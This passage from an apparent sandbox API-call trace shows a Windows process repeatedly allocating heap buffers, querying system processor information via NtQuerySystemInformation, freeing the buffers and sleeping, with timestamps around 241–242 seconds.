0xc0000004 [0241.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0241.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0241.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0241.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0241.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0241.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.799] Sleep (dwMilliseconds=0x110) [0241.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0241.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0241.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0241.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0241.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0241.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0241.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0241.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0241.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.818] Sleep (dwMilliseconds=0x110) [0241.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0241.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0241.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0241.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0241.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0241.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0241.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0241.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0241.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.829] Sleep (dwMilliseconds=0x110) [0241.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0241.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0241.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0241.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0241.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0241.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0241.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0241.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0241.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.845] Sleep (dwMilliseconds=0x110) [0241.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0241.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0241.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0241.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0241.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0241.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0241.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0241.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0241.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.864] Sleep (dwMilliseconds=0x110) [0241.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0241.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0241.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0241.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0241.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0241.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0241.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0241.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0241.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.879] Sleep (dwMilliseconds=0x110) [0241.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0241.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0241.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0241.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0241.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0241.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0241.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0241.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0241.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.890] Sleep (dwMilliseconds=0x110) [0241.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0241.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0241.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0241.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0241.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0241.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0241.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0241.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0241.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.911] Sleep (dwMilliseconds=0x110) [0241.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0241.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0241.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0241.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0241.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0241.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0241.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0241.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0241.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.928] Sleep (dwMilliseconds=0x110) [0241.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0241.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0241.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0241.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0241.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0241.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0241.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0241.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0241.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.959] Sleep (dwMilliseconds=0x110) [0241.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0241.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0241.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0241.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0241.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0241.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0241.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0241.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0241.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.970] Sleep (dwMilliseconds=0x110) [0241.994] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0241.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.995] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0241.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0241.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0241.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0241.996] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0241.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0241.997] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.997] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0241.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.998] Sleep (dwMilliseconds=0x110) [0242.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0242.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0242.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0242.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0242.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0242.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0242.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0242.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0242.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.020] Sleep (dwMilliseconds=0x110) [0242.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0242.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0242.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0242.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0242.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0242.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0242.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0242.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0242.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.036] Sleep (dwMilliseconds=0x110) [0242.057] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0242.057] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.058] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0242.058] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 